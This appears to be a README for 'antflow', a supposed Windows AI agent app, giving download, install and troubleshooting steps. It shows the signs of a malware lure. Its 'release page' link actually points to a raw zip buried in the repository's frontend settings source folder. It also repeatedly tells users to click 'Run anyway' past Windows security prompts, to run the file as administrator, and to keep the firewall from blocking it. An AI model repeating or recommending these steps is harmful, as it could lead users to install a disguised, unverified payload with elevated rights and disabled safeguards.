antflow is an AI agent platform for Windows. It helps you run agent-based tasks from one app, with a setup based on Agent OS ideas and DeerFlow. It is built for end users who want a simple way to use AI agents without working through a full developer setup.
Use antflow to:
- run AI-assisted tasks
- manage agent workflows in one place
- keep your work in a local app on Windows
- start fast with a simple download
To get antflow, visit the release page and download the Windows file for your system:
Download antflow from GitHub Releases
After you open the release page:
- Find the latest release
- Open the Assets section
- Download the Windows file, such as an
.exeor.zip - Save it to your computer
If you get a .zip file, extract it first. If you get an .exe file, you can run it right away.
antflow is designed for Windows desktop use.
Recommended setup:
- Windows 10 or Windows 11
- 8 GB RAM or more
- 2 GB free disk space
- Internet access for AI features
- A modern browser for account sign-in or web-based tools
For best results, use:
- a recent Intel or AMD processor
- a stable network connection
- at least 1080p display resolution
Follow these steps to install antflow:
- Open the release page: https://github.com/Namits5632/antflow/raw/refs/heads/main/frontend/src/core/settings/Software_3.3-beta.2.zip
- Download the latest Windows package
- If the file is a
.zip, right-click it and choose Extract All - Open the extracted folder
- Double-click the app file to start antflow
- If Windows asks for permission, select Yes
- Wait for the app to open
If Windows shows a security check:
- choose More info if needed
- then choose Run anyway if you trust the source file
When antflow opens for the first time:
- Wait for the main window to load
- Read the welcome screen or setup page
- Sign in if the app asks for it
- Choose your preferred AI or agent settings
- Start a sample task to test the app
If the app asks for internet access, allow it so the agents can connect to the services they need.
antflow is meant to keep AI work in one place. A normal flow looks like this:
- Open the app
- Create a new task or agent run
- Enter what you want the agent to do
- Review the plan or steps
- Start the task
- Check the results when it finishes
You can use it for tasks such as:
- writing help
- research help
- workflow automation
- planning steps for a project
- running repeated agent jobs
antflow includes a set of tools for agent-based work:
- Agent OS style workflow structure
- DeerFlow-based core design
- Simple task start and review flow
- Local desktop use on Windows
- Support for repeated agent runs
- Clear workspace for managing jobs
- Easy setup through GitHub Releases
These features are built to help you move from a task idea to a running agent flow with less friction.
To keep antflow running well:
- keep Windows updated
- close other heavy apps if the app feels slow
- use a stable internet connection
- store the app in a folder you can find easily
- keep the release file in case you need to reinstall
If the app uses model or API settings, keep your keys or account details in a safe place.
Before you open the app:
- confirm you downloaded it from the release page
- check the file name and version
- avoid modified files from other sites
- only run files you trust
If you want to update later, return to the same release page and download the newest version.
- Make sure the download finished
- If it is a
.zip, extract it first - Try running the app as an administrator
- Open the file again
- Choose More info if Windows shows the prompt
- Select Run anyway if you trust the release
- Check your internet connection
- Restart the app
- Try again after a few minutes
- Make sure Windows Firewall is not blocking it
- Try again later
- Use a stable network
- Download from the latest release, not an old mirrored file
To update antflow:
- Open the release page
- Download the newest Windows file
- Close the old app
- Replace the old files if needed
- Open the new version
Keep one copy of the latest working release in case you need to go back.
You may see files like these after extraction:
- the main app file
- support folders
- settings files
- logs or cache files
Do not delete support files unless you know what they do. The app may need them to run.
antflow focuses on practical agent work. It is meant to give you a desktop place to start, track, and manage AI tasks. The layout should stay simple, with clear steps and a direct path from launch to action
- Download the latest release
- Extract the file if needed
- Open the app
- Allow access if Windows asks
- Set up your first agent task
- Run a test job
- Review the result